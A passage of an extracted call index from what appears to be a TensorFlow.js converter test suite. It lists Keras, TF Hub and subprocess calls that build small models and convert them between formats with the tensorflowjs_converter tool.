"tensorflow_hub.add_signature" ]
[((1826, 1850), 'tensorflow.keras.layers.Input', 'keras.layers.Input', (['(3,)'], {}), '((3,))\n', (1844, 1850), False, 'from tensorflow import keras\n'), ((2177, 2236), 'tensorflow.keras.models.Model', 'keras.models.Model', ([], {'inputs': '[input_tensor]', 'outputs': '[output]'}), '(inputs=[input_tensor], outputs=[output])\n', (2195, 2236), False, 'from tensorflow import keras\n'), ((2622, 2632), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (2630, 2632), True, 'import tensorflow as tf\n'), ((3916, 3952), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(1.0)'], {'shape': '[1]'}), '(1.0, shape=[1])\n', (3936, 3952), False, 'from tensorflow.python.framework import constant_op\n'), ((3961, 3985), 'tensorflow.python.training.tracking.tracking.AutoTrackable', 'tracking.AutoTrackable', ([], {}), '()\n', (3983, 3985), False, 'from tensorflow.python.training.tracking import tracking\n'), ((3998, 4021), 'tensorflow.python.ops.variables.Variable', 'variables.Variable', (['(3.0)'], {}), '(3.0)\n', (4016, 4021), False, 'from tensorflow.python.ops import variables\n'), ((4033, 4056), 'tensorflow.python.ops.variables.Variable', 'variables.Variable', (['(2.0)'], {}), '(2.0)\n', (4051, 4056), False, 'from tensorflow.python.ops import variables\n'), ((4067, 4121), 'tensorflow.python.eager.def_function.function', 'def_function.function', (['(lambda x: root.v1 * root.v2 * x)'], {}), '(lambda x: root.v1 * root.v2 * x)\n', (4088, 4121), False, 'from tensorflow.python.eager import def_function\n'), ((4178, 4208), 'tensorflow.python.saved_model.save.save', 'save', (['root', 'save_path', 'to_save'], {}), '(root, save_path, to_save)\n', (4182, 4208), False, 'from tensorflow.python.saved_model.save import save\n'), ((4580, 4590), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (4588, 4590), True, 'import tensorflow as tf\n'), ((33845, 33859), 'tensorflow.test.main', 'tf.test.main', ([], {}), '()\n', (33857, 33859), True, 'import tensorflow as tf\n'), ((1863, 1986), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['(4)'], {'use_bias': '(True)', 'kernel_initializer': '"""ones"""', 'bias_initializer': '"""zeros"""', 'name': "(layer_name_prefix + '1')"}), "(4, use_bias=True, kernel_initializer='ones',\n bias_initializer='zeros', name=layer_name_prefix + '1')\n", (1881, 1986), False, 'from tensorflow import keras\n'), ((2039, 2138), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['(2)'], {'use_bias': '(False)', 'kernel_initializer': '"""ones"""', 'name': "(layer_name_prefix + '2')"}), "(2, use_bias=False, kernel_initializer='ones', name=\n layer_name_prefix + '2')\n", (2057, 2138), False, 'from tensorflow import keras\n'), ((4450, 4473), 'tensorflow.Variable', 'tf.Variable', (['[2.0, 4.0]'], {}), '([2.0, 4.0])\n', (4461, 4473), True, 'import tensorflow as tf\n'), ((4482, 4524), 'tensorflow.compat.v1.placeholder', 'tf.compat.v1.placeholder', ([], {'dtype': 'tf.float32'}), '(dtype=tf.float32)\n', (4506, 4524), True, 'import tensorflow as tf\n'), ((4529, 4571), 'tensorflow_hub.add_signature', 'hub.add_signature', ([], {'inputs': 'x', 'outputs': '(x * w)'}), '(inputs=x, outputs=x * w)\n', (4546, 4571), True, 'import tensorflow_hub as hub\n'), ((4629, 4669), 'tensorflow_hub.create_module_spec', 'hub.create_module_spec', (['double_module_fn'], {}), '(double_module_fn)\n', (4651, 4669), True, 'import tensorflow_hub as hub\n'), ((4678, 4694), 'tensorflow_hub.Module', 'hub.Module', (['spec'], {}), '(spec)\n', (4688, 4694), True, 'import tensorflow_hub as hub\n'), ((4725, 4758), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {'graph': 'graph'}), '(graph=graph)\n', (4745, 4758), True, 'import tensorflow as tf\n'), ((5014, 5032), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {}), '()\n', (5030, 5032), False, 'import tempfile\n'), ((5062, 5111), 'os.path.join', 'os.path.join', (['cls.class_tmp_dir', '"""tf_saved_model"""'], {}), "(cls.class_tmp_dir, 'tf_saved_model')\n", (5074, 5111), False, 'import os\n'), ((5144, 5196), 'os.path.join', 'os.path.join', (['cls.class_tmp_dir', '"""tf_saved_model_v1"""'], {}), "(cls.class_tmp_dir, 'tf_saved_model_v1')\n", (5156, 5196), False, 'import os\n'), ((5369, 5417), 'os.path.join', 'os.path.join', (['cls.class_tmp_dir', '"""tf_hub_module"""'], {}), "(cls.class_tmp_dir, 'tf_hub_module')\n", (5381, 5417), False, 'import os\n'), ((5510, 5542), 'shutil.rmtree', 'shutil.rmtree', (['cls.class_tmp_dir'], {}), '(cls.class_tmp_dir)\n', (5523, 5542), False, 'import shutil\n'), ((5923, 5941), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {}), '()\n', (5939, 5941), False, 'import tempfile\n'), ((6013, 6041), 'os.path.isdir', 'os.path.isdir', (['self._tmp_dir'], {}), '(self._tmp_dir)\n', (6026, 6041), False, 'import os\n'), ((9021, 9192), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'nonsensical_format', self.\n _tmp_dir, self._tmp_dir]"], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE'}), "(['tensorflowjs_converter', '--input_format',\n 'nonsensical_format', self._tmp_dir, self._tmp_dir], stdout=subprocess.\n PIPE, stderr=subprocess.PIPE)\n", (9037, 9192), False, 'import subprocess\n'), ((9452, 9549), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter']"], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE'}), "(['tensorflowjs_converter'], stdout=subprocess.PIPE, stderr\n =subprocess.PIPE)\n", (9468, 9549), False, 'import subprocess\n'), ((15253, 15280), 'os.path.join', 'os.path.join', (['self._tmp_dir'], {}), '(self._tmp_dir)\n', (15265, 15280), False, 'import os\n'), ((15295, 15463), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'tf_saved_model',\n '--output_format', 'tfjs_graph_model', self.tf_saved_model_v1_dir,\n output_dir]"], {}), "(['tensorflowjs_converter', '--input_format',\n 'tf_saved_model', '--output_format', 'tfjs_graph_model', self.\n tf_saved_model_v1_dir, output_dir])\n", (15311, 15463), False, 'import subprocess\n'), ((16083, 16110), 'os.path.join', 'os.path.join', (['self._tmp_dir'], {}), '(self._tmp_dir)\n', (16095, 16110), False, 'import os\n'), ((16125, 16237), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'tf_hub', self.\n tf_hub_module_dir, output_dir]"], {}), "(['tensorflowjs_converter', '--input_format', 'tf_hub',\n self.tf_hub_module_dir, output_dir])\n", (16141, 16237), False, 'import subprocess\n'), ((16915, 16942), 'os.path.join', 'os.path.join', (['self._tmp_dir'], {}), '(self._tmp_dir)\n', (16927, 16942), False, 'import os\n'), ((16957, 17122), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'tf_saved_model',\n '--output_format', 'tfjs_graph_model', self.tf_saved_model_dir, output_dir]"], {}), "(['tensorflowjs_converter', '--input_format',\n 'tf_saved_model', '--output_format', 'tfjs_graph_model', self.\n tf_saved_model_dir, output_dir])\n", (16973, 17122), False, 'import subprocess\n'), ((18336, 18363), 'os.path.join', 'os.path.join', (['self._tmp_dir'], {}), '(self._tmp_dir)\n', (18348, 18363), False, 'import os\n'), ((18378, 18490), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'tf_hub', self.\n tf_hub_module_dir, output_dir]"], {}), "(['tensorflowjs_converter', '--input_format', 'tf_hub',\n self.tf_hub_module_dir, output_dir])\n", (18394, 18490), False, 'import subprocess\n'), ((19283, 19334), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""keras_h5"""', '"""model.h5"""'], {}), "(self._tmp_dir, 'keras_h5', 'model.h5')\n", (19295, 19334), False, 'import os\n'), ((19560, 19659), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'keras', h5_path, self._tmp_dir]"], {}), "(['tensorflowjs_converter', '--input_format', 'keras',\n h5_path, self._tmp_dir])\n", (19576, 19659), False, 'import subprocess\n'), ((19825, 19866), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""model_2.h5"""'], {}), "(self._tmp_dir, 'model_2.h5')\n", (19837, 19866), False, 'import os\n'), ((20632, 20683), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""keras_h5"""', '"""model.h5"""'], {}), "(self._tmp_dir, 'keras_h5', 'model.h5')\n", (20644, 20683), False, 'import os\n'), ((20909, 21008), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'keras', h5_path, self._tmp_dir]"], {}), "(['tensorflowjs_converter', '--input_format', 'keras',\n h5_path, self._tmp_dir])\n", (20925, 21008), False, 'import subprocess\n'), ((21455, 21565), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--version']"], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE'}), "(['tensorflowjs_converter', '--version'], stdout=subprocess\n .PIPE, stderr=subprocess.PIPE)\n", (21471, 21565), False, 'import subprocess\n'), ((21804, 21906), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '-v']"], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE'}), "(['tensorflowjs_converter', '-v'], stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n", (21820, 21906), False, 'import subprocess\n'), ((22281, 22299), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {}), '()\n', (22297, 22299), False, 'import tempfile\n'), ((22330, 22358), 'os.path.isdir', 'os.path.isdir', (['self._tmp_dir'], {}), '(self._tmp_dir)\n', (22343, 22358), False, 'import os\n'), ((22507, 22525), 'tensorflow.keras.Sequential', 'keras.Sequential', ([], {}), '()\n', (22523, 22525), False, 'from tensorflow import keras\n'), ((22755, 22773), 'tensorflow.keras.Sequential', 'keras.Sequential', ([], {}), '()\n', (22771, 22773), False, 'from tensorflow import keras\n'), ((22977, 22999), 'tensorflow.keras.Input', 'keras.Input', ([], {'shape': '[8]'}), '(shape=[8])\n', (22988, 22999), False, 'from tensorflow import keras\n'), ((23013, 23036), 'tensorflow.keras.Input', 'keras.Input', ([], {'shape': '[10]'}), '(shape=[10])\n', (23024, 23036), False, 'from tensorflow import keras\n'), ((23157, 23189), 'tensorflow.keras.Model', 'keras.Model', (['[input1, input2]', 'y'], {}), '([input1, input2], y)\n', (23168, 23189), False, 'from tensorflow import keras\n'), ((32381, 32403), 'numpy.random.randn', 'np.random.randn', (['(8)', '(10)'], {}), '(8, 10)\n', (32396, 32403), True, 'import numpy as np\n'), ((32454, 32472), 'tensorflow.keras.Sequential', 'keras.Sequential', ([], {}), '()\n', (32470, 32472), False, 'from tensorflow import keras\n'), ((32621, 32660), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""model.h5"""'], {}), "(self._tmp_dir, 'model.h5')\n", (32633, 32660), False, 'import os\n'), ((32784, 32826), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""tfjs_layers"""'], {}), "(self._tmp_dir, 'tfjs_layers')\n", (32796, 32826), False, 'import os\n'), ((32900, 33009), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'keras', h5_path,\n layers_model_output_dir]"], {}), "(['tensorflowjs_converter', '--input_format', 'keras',\n h5_path, layers_model_output_dir])\n", (32916, 33009), False, 'import subprocess\n'), ((33189, 33230), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""tfjs_graph"""'], {}), "(self._tmp_dir, 'tfjs_graph')\n", (33201, 33230), False, 'import os\n'), ((2669, 2704), 'tensorflow.compat.v1.name_scope', 'tf.compat.v1.name_scope', (['name_scope'], {}), '(name_scope)\n', (2692, 2704), True, 'import tensorflow as tf\n'), ((2716, 2766), 'tensorflow.compat.v1.constant', 'tf.compat.v1.constant', (['[[37.0, -23.0], [1.0, 4.0]]'], {}), '([[37.0, -23.0], [1.0, 4.0]])\n', (2737, 2766), True, 'import tensorflow as tf\n'), ((2777, 2821), 'tensorflow.compat.v1.get_variable', 'tf.compat.v1.get_variable', (['"""w"""'], {'shape': '[2, 2]'}), "('w', shape=[2, 2])\n", (2802, 2821), True, 'import tensorflow as tf\n'), ((2832, 2857), 'tensorflow.compat.v1.matmul', 'tf.compat.v1.matmul', (['x', 'w'], {}), '(x, w)\n', (2851, 2857), True, 'import tensorflow as tf\n'), ((2873, 2899), 'tensorflow.compat.v1.nn.softmax', 'tf.compat.v1.nn.softmax', (['y'], {}), '(y)\n', (2896, 2899), True, 'import tensorflow as tf\n'), ((2973, 3034), 'tensorflow.compat.v1.saved_model.builder.SavedModelBuilder', 'tf.compat.v1.saved_model.builder.SavedModelBuilder', (['save_path'], {}), '(save_path)\n', (3023, 3034), True, 'import tensorflow as tf\n'), ((4781, 4824), 'tensorflow.compat.v1.global_variables_initializer', 'tf.compat.v1.global_variables_initializer', ([], {}), '()\n', (4822, 4824), True, 'import tensorflow as tf\n'), ((6049, 6077), 'shutil.rmtree', 'shutil.rmtree', (['self._tmp_dir'], {}), '(self._tmp_dir)\n', (6062, 6077), False, 'import shutil\n'), ((6178, 6205), 'tensorflowjs.__version__.count', 'tfjs.__version__.count', (['"""."""'], {}), "('.')\n", (6200, 6205), True, 'import tensorflowjs as tfjs\n'), ((6364, 6418), 'tensorflowjs.converters.save_keras_model', 'tfjs.converters.save_keras_model', (['model', 'self._tmp_dir'], {}), '(model, self._tmp_dir)\n', (6396, 6418), True, 'import tensorflowjs as tfjs\n'), ((8039, 8061), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (8059, 8061), True, 'import tensorflow as tf\n'), ((8157, 8212), 'tensorflowjs.converters.save_keras_model', 'tfjs.converters.save_keras_model', (['model1', 'self._tmp_dir'], {}), '(model1, self._tmp_dir)\n', (8189, 8212), True, 'import tensorflowjs as tfjs\n'), ((8298, 8320), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (8318, 8320), True, 'import tensorflow as tf\n'), ((9364, 9390), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', (['stderr'], {}), '(stderr)\n', (9382, 9390), True, 'import tensorflow as tf\n'), ((9709, 9735), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', (['stderr'], {}), '(stderr)\n', (9727, 9735), True, 'import tensorflow as tf\n'), ((9819, 9841), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (9839, 9841), True, 'import tensorflow as tf\n'), ((9958, 10009), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""keras_h5"""', '"""model.h5"""'], {}), "(self._tmp_dir, 'keras_h5', 'model.h5')\n", (9970, 10009), False, 'import os\n'), ((10081, 10180), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'keras', h5_path, self._tmp_dir]"], {}), "(['tensorflowjs_converter', '--input_format', 'keras',\n h5_path, self._tmp_dir])\n", (10097, 10180), False, 'import subprocess\n'), ((12252, 12274), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (12272, 12274), True, 'import tensorflow as tf\n'), ((12391, 12442), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""keras_h5"""', '"""model.h5"""'], {}), "(self._tmp_dir, 'keras_h5', 'model.h5')\n", (12403, 12442), False, 'import os\n'), ((12514, 12641), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'keras',\n '--split_weights_by_layer', h5_path, self._tmp_dir]"], {}), "(['tensorflowjs_converter', '--input_format', 'keras',\n '--split_weights_by_layer', h5_path, self._tmp_dir])\n", (12530, 12641), False, 'import subprocess\n'), ((15148, 15174), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', (['stderr'], {}), '(stderr)\n', (15166, 15174), True, 'import tensorflow as tf\n'), ((19228, 19267), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""keras_h5"""'], {}), "(self._tmp_dir, 'keras_h5')\n", (19240, 19267), False, 'import os\n'), ((19369, 19391), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (19389, 19391), True, 'import tensorflow as tf\n'), ((20277, 20299), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (20297, 20299), True, 'import tensorflow as tf\n'), ((20317, 20353), 'tensorflow.keras.models.load_model', 'keras.models.load_model', (['new_h5_path'], {}), '(new_h5_path)\n', (20340, 20353), False, 'from tensorflow import keras\n'), ((20577, 20616), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""keras_h5"""'], {}), "(self._tmp_dir, 'keras_h5')\n", (20589, 20616), False, 'import os\n'), ((20718, 20740), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (20738, 20740), True, 'import tensorflow as tf\n'), ((21200, 21222), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (21220, 21222), True, 'import tensorflow as tf\n'), ((21695, 21751), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', (["('tensorflowjs %s' % tfjs.__version__)"], {}), "('tensorflowjs %s' % tfjs.__version__)\n", (21713, 21751), True, 'import tensorflow as tf\n'), ((21761, 21787), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', (['stdout'], {}), '(stdout)\n', (21779, 21787), True, 'import tensorflow as tf\n'), ((22037, 22093), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', (["('tensorflowjs %s' % tfjs.__version__)"], {}), "('tensorflowjs %s' % tfjs.__version__)\n", (22055, 22093), True, 'import tensorflow as tf\n'), ((22103, 22129), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', (['stdout'], {}), '(stdout)\n', (22121, 22129), True, 'import tensorflow as tf\n'), ((22366, 22394), 'shutil.rmtree', 'shutil.rmtree', (['self._tmp_dir'], {}), '(self._tmp_dir)\n', (22379, 22394), False, 'import shutil\n'), ((22540, 22585), 'tensorflow.keras.layers.Reshape', 'keras.layers.Reshape', (['[2, 3]'], {'input_shape': '[6]'}), '([2, 3], input_shape=[6])\n', (22560, 22585), False, 'from tensorflow import keras\n'), ((22601, 22622), 'tensorflow.keras.layers.LSTM', 'keras.layers.LSTM', (['(10)'], {}), '(10)\n', (22618, 22622), False, 'from tensorflow import keras\n'), ((22638, 22681), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['(1)'], {'activation': '"""sigmoid"""'}), "(1, activation='sigmoid')\n", (22656, 22681), False, 'from tensorflow import keras\n'), ((22788, 22846), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['(6)'], {'input_shape': '[10]', 'activation': '"""relu"""'}), "(6, input_shape=[10], activation='relu')\n", (22806, 22846), False, 'from tensorflow import keras\n'), ((23045, 23071), 'tensorflow.keras.layers.Concatenate', 'keras.layers.Concatenate', ([], {}), '()\n', (23069, 23071), False, 'from tensorflow import keras\n'), ((23098, 23141), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['(4)'], {'activation': '"""softmax"""'}), "(4, activation='softmax')\n", (23116, 23141), False, 'from tensorflow import keras\n'), ((23314, 23336), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (23334, 23336), True, 'import tensorflow as tf\n'), ((23348, 23370), 'numpy.random.randn', 'np.random.randn', (['(8)', '(10)'], {}), '(8, 10)\n', (23363, 23370), True, 'import numpy as np\n'), ((23559, 23618), 'tensorflow.keras.experimental.export_saved_model', 'keras.experimental.export_saved_model', (['model', 'self._tmp_dir'], {}), '(model, self._tmp_dir)\n', (23596, 23618), False, 'from tensorflow import keras\n'), ((23701, 23736), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""tfjs"""'], {}), "(self._tmp_dir, 'tfjs')\n", (23713, 23736), False, 'import os\n'), ((23814, 23933), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'keras_saved_model', self.\n _tmp_dir, tfjs_output_dir]"], {}), "(['tensorflowjs_converter', '--input_format',\n 'keras_saved_model', self._tmp_dir, tfjs_output_dir])\n", (23830, 23933), False, 'import subprocess\n'), ((24057, 24100), 'os.path.join', 'os.path.join', (['tfjs_output_dir', '"""model.json"""'], {}), "(tfjs_output_dir, 'model.json')\n", (24069, 24100), False, 'import os\n'), ((24231, 24271), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""new_h5.h5"""'], {}), "(self._tmp_dir, 'new_h5.h5')\n", (24243, 24271), False, 'import os\n'), ((24288, 24437), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'tfjs_layers_model',\n '--output_format', 'keras', model_json_path, new_h5_path]"], {}), "(['tensorflowjs_converter', '--input_format',\n 'tfjs_layers_model', '--output_format', 'keras', model_json_path,\n new_h5_path])\n", (24304, 24437), False, 'import subprocess\n'), ((24691, 24727), 'tensorflow.keras.models.load_model', 'keras.models.load_model', (['new_h5_path'], {}), '(new_h5_path)\n', (24714, 24727), False, 'from tensorflow import keras\n'), ((24902, 24924), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (24922, 24924), True, 'import tensorflow as tf\n'), ((24937, 24958), 'numpy.random.randn', 'np.random.randn', (['(4)', '(8)'], {}), '(4, 8)\n', (24952, 24958), True, 'import numpy as np\n'), ((24970, 24992), 'numpy.random.randn', 'np.random.randn', (['(4)', '(10)'], {}), '(4, 10)\n', (24985, 24992), True, 'import numpy as np\n'), ((25193, 25252), 'tensorflow.keras.experimental.export_saved_model', 'keras.experimental.export_saved_model', (['model', 'self._tmp_dir'], {}), '(model, self._tmp_dir)\n', (25230, 25252), False, 'from tensorflow import keras\n'), ((25335, 25370), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""tfjs"""'], {}), "(self._tmp_dir, 'tfjs')\n", (25347, 25370), False, 'import os\n'), ((25449, 25613), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'keras_saved_model',\n '--output_format', 'tfjs_layers_model', self._tmp_dir, tfjs_output_dir]"], {}), "(['tensorflowjs_converter', '--input_format',\n 'keras_saved_model', '--output_format', 'tfjs_layers_model', self.\n _tmp_dir, tfjs_output_dir])\n", (25465, 25613), False, 'import subprocess\n'), ((25742, 25785), 'os.path.join', 'os.path.join', (['tfjs_output_dir', '"""model.json"""'], {}), "(tfjs_output_dir, 'model.json')\n", (25754, 25785), False, 'import os\n'), ((25916, 25956), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""new_h5.h5"""'], {}), "(self._tmp_dir, 'new_h5.h5')\n", (25928, 25956), False, 'import os\n'), ((25973, 26122), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'tfjs_layers_model',\n '--output_format', 'keras', model_json_path, new_h5_path]"], {}), "(['tensorflowjs_converter', '--input_format',\n 'tfjs_layers_model', '--output_format', 'keras', model_json_path,\n new_h5_path])\n", (25989, 26122), False, 'import subprocess\n'), ((26376, 26412), 'tensorflow.keras.models.load_model', 'keras.models.load_model', (['new_h5_path'], {}), '(new_h5_path)\n', (26399, 26412), False, 'from tensorflow import keras\n'), ((26586, 26608), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (26606, 26608), True, 'import tensorflow as tf\n'), ((26620, 26642), 'numpy.random.randn', 'np.random.randn', (['(8)', '(10)'], {}), '(8, 10)\n', (26635, 26642), True, 'import numpy as np\n'), ((26831, 26890), 'tensorflow.keras.experimental.export_saved_model', 'keras.experimental.export_saved_model', (['model', 'self._tmp_dir'], {}), '(model, self._tmp_dir)\n', (26868, 26890), False, 'from tensorflow import keras\n'), ((26973, 27008), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""tfjs"""'], {}), "(self._tmp_dir, 'tfjs')\n", (26985, 27008), False, 'import os\n'), ((27075, 27236), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'keras', self._tmp_dir,\n tfjs_output_dir]"], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE'}), "(['tensorflowjs_converter', '--input_format', 'keras', self\n ._tmp_dir, tfjs_output_dir], stdout=subprocess.PIPE, stderr=subprocess.PIPE\n )\n", (27091, 27236), False, 'import subprocess\n'), ((27573, 27595), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (27593, 27595), True, 'import tensorflow as tf\n'), ((27607, 27629), 'numpy.random.randn', 'np.random.randn', (['(8)', '(10)'], {}), '(8, 10)\n', (27622, 27629), True, 'import numpy as np\n'), ((27919, 27978), 'tensorflow.keras.experimental.export_saved_model', 'keras.experimental.export_saved_model', (['model', 'self._tmp_dir'], {}), '(model, self._tmp_dir)\n', (27956, 27978), False, 'from tensorflow import keras\n'), ((28074, 28109), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""tfjs"""'], {}), "(self._tmp_dir, 'tfjs')\n", (28086, 28109), False, 'import os\n'), ((28187, 28306), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'keras_saved_model', self.\n _tmp_dir, tfjs_output_dir]"], {}), "(['tensorflowjs_converter', '--input_format',\n 'keras_saved_model', self._tmp_dir, tfjs_output_dir])\n", (28203, 28306), False, 'import subprocess\n'), ((28674, 28717), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""tfjs_sharded"""'], {}), "(self._tmp_dir, 'tfjs_sharded')\n", (28686, 28717), False, 'import os\n'), ((29738, 29778), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""new_h5.h5"""'], {}), "(self._tmp_dir, 'new_h5.h5')\n", (29750, 29778), False, 'import os\n'), ((30076, 30098), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (30096, 30098), True, 'import tensorflow as tf\n'), ((30212, 30248), 'tensorflow.keras.models.load_model', 'keras.models.load_model', (['new_h5_path'], {}), '(new_h5_path)\n', (30235, 30248), False, 'from tensorflow import keras\n'), ((30411, 30433), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (30431, 30433), True, 'import tensorflow as tf\n'), ((30445, 30467), 'numpy.random.randn', 'np.random.randn', (['(8)', '(10)'], {}), '(8, 10)\n', (30460, 30467), True, 'import numpy as np\n'), ((30757, 30816), 'tensorflow.keras.experimental.export_saved_model', 'keras.experimental.export_saved_model', (['model', 'self._tmp_dir'], {}), '(model, self._tmp_dir)\n', (30794, 30816), False, 'from tensorflow import keras\n'), ((30912, 30947), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""tfjs"""'], {}), "(self._tmp_dir, 'tfjs')\n", (30924, 30947), False, 'import os\n'), ((31025, 31144), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'keras_saved_model', self.\n _tmp_dir, tfjs_output_dir]"], {}), "(['tensorflowjs_converter', '--input_format',\n 'keras_saved_model', self._tmp_dir, tfjs_output_dir])\n", (31041, 31144), False, 'import subprocess\n'), ((31516, 31559), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""tfjs_sharded"""'], {}), "(self._tmp_dir, 'tfjs_sharded')\n", (31528, 31559), False, 'import os\n'), ((32140, 32172), 'os.path.getsize', 'os.path.getsize', (['weight_files[0]'], {}), '(weight_files[0])\n', (32155, 32172), False, 'import os\n'), ((32487, 32545), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['(10)'], {'activation': '"""relu"""', 'input_shape': '[4]'}), "(10, activation='relu', input_shape=[4])\n", (32505, 32545), False, 'from tensorflow import keras\n'), ((32561, 32604), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['(1)'], {'activation': '"""sigmoid"""'}), "(1, activation='sigmoid')\n", (32579, 32604), False, 'from tensorflow import keras\n'), ((3047, 3069), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (3067, 3069), True, 'import tensorflow as tf\n'), ((5716, 5741), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (5731, 5741), False, 'import os\n'), ((6550, 6562), 'json.load', 'json.load', (['f'], {}), '(f)\n', (6559, 6562), False, 'import json\n'), ((8426, 8467), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""model.json"""'], {}), "(self._tmp_dir, 'model.json')\n", (8438, 8467), False, 'import os\n'), ((8917, 8956), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""group*-*"""'], {}), "(self._tmp_dir, 'group*-*')\n", (8929, 8956), False, 'import os\n'), ((9901, 9940), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""keras_h5"""'], {}), "(self._tmp_dir, 'keras_h5')\n", (9913, 9940), False, 'import os\n'), ((10416, 10428), 'json.load', 'json.load', (['f'], {}), '(f)\n', (10425, 10428), False, 'import json\n'), ((12334, 12373), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""keras_h5"""'], {}), "(self._tmp_dir, 'keras_h5')\n", (12346, 12373), False, 'import os\n'), ((12877, 12889), 'json.load', 'json.load', (['f'], {}), '(f)\n', (12886, 12889), False, 'import json\n'), ((14813, 14850), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""foo.h5"""'], {}), "(self._tmp_dir, 'foo.h5')\n", (14825, 14850), False, 'import os\n'), ((14864, 14901), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""output"""'], {}), "(self._tmp_dir, 'output')\n", (14876, 14901), False, 'import os\n'), ((15780, 15818), 'os.path.join', 'os.path.join', (['output_dir', 